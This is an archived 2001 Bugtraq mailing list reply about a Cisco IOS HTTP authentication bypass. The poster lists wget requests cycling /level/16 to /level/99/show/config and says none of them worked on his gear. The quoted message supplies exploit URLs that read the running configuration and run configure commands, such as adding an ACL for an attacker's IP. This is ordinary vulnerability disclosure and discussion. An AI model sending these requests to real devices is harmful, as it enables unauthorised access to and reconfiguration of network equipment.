Bugtraq mailing list archives

Re: Cisco device HTTP exploit...

From: "Marc-Adrian Napoli" <marcadrian () cia com au>
Date: Tue, 3 Jul 2001 16:57:45 +1000

hi,

i cant seem to recreate this exploit on any of my 1900/2900/2500/2600's?

ip http server
ip http authentication local

i have a little /bin/sh that does the following:

wget http://10.10.10.10/level/16/show/config
.
.
wget http://10.10.10.10/level/99/show/config


i get auth failed on all of them! anyone?

Regards,

Marc-Adrian Napoli
Network Administrator
Connect infobahn Australia
+61 2 92120387

You can also run configuration commands. :)

http://169.254.0.15/level/42/configure/-/banner/motd/LINE, etc.

Start with http://169.254.0.16/level/xx/configure  and go from there.

A malicious user could use:

http://169.254.0.15/level/42/exec/show%20conf

to get, for instance, vty 0 4 acl information and then add an ACL for
his/her source ip. 

I tested creating a banner.  I assume other configure commands will work
as well.  This was tested on a Cisco switch.  Anyone?

Current thread:

Cisco device HTTP exploit... Half Adder (Jul 02)
- Re: Cisco device HTTP exploit... Marc-Adrian Napoli (Jul 03)
  - Re: Cisco device HTTP exploit... Damir Rajnovic (Jul 04)
- Re: Cisco device HTTP exploit... Grzegorz Krawczyk (Jul 03)
- <Possible follow-ups>
- RE: Cisco device HTTP exploit... Thornton, Simon (Simon)** CTR ** (Jul 05)